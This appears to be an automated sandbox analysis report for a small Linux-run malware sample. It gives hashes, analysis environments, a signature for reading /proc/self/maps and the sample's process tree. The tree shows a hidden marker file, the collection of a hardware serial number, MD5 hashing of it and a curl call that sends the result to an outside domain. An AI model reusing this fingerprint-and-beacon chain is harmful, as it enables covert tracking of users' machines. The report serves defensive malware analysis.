Analysis
- max time kernel: 148s
- max time network: 128s
- platform: ubuntu-18.04_amd64
- resource: ubuntu1804-amd64-20240729-en
- resource tags: arch:amd64, arch:i386, image:ubuntu1804-amd64-20240729-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
- submitted: 29-07-2024 07:40
- Static task: static1
- Behavioral task: behavioral1, Sample: 3c6492a33885e363cae2841e0597c730_JaffaCakes118, Resource: ubuntu1804-amd64-20240729-en
- Behavioral task: behavioral2, Sample: 3c6492a33885e363cae2841e0597c730_JaffaCakes118, Resource: debian9-armhf-20240729-en
- Behavioral task: behavioral3, Sample: 3c6492a33885e363cae2841e0597c730_JaffaCakes118, Resource: debian9-mipsbe-20240729-en
- Behavioral task: behavioral4, Sample: 3c6492a33885e363cae2841e0597c730_JaffaCakes118, Resource: debian9-mipsel-20240729-en
General
- Target: 3c6492a33885e363cae2841e0597c730_JaffaCakes118
- Size: 10KB
- MD5: 3c6492a33885e363cae2841e0597c730
- SHA1: 99d5f88fb1a33f321aa614cfe792200bdf9eba5c
- SHA256: ead1f229097555af8724321021bb8bb5421947e67cd244065dbd2990a6dcdb49
- SHA512: 302bdb0ffb3be9285e7453e04d6067ca03ebdb21af5c0f26e6cb982de1c91631bffb2aab5e2f3a298a54b93337e1b510bee87e3855503a246a130bcc87ce5193
- SSDEEP: 192:g0AjH8A5Zjpcjxi3LKVMyIu8bXkvLvTWM3Tk3Sw3a8na8:g1cA5t8xgNb0/mVLnP
Malware Config
Signatures
- Reads runtime system information (1 IoCs)
  Reads data from /proc virtual filesystem.
  Processes: awk
  description: File opened for reading; ioc: /proc/self/maps; process: awk
Processes
- /tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes118: /tmp/3c6492a33885e363cae2841e0597c730_JaffaCakes118 (PID:1525)
  - /usr/bin/touch: touch "/root/Library/Application Support/.upd2029" (PID:1527)
  - /usr/bin/openssl: openssl md5 (PID:1532)
  - /usr/bin/tr: tr -d "\\n" (PID:1531)
  - /usr/bin/awk: awk "-F\"" "/IOPlatformSerialNumber/{print \$(NF-1)}" (PID:1530; Reads runtime system information)
  - /usr/bin/curl: curl -s -L "http://events.macmymacupdater.com/services/channel/?mid=(stdin)= d41d8cd98f00b204e9800998ecf8427e" (PID:1534)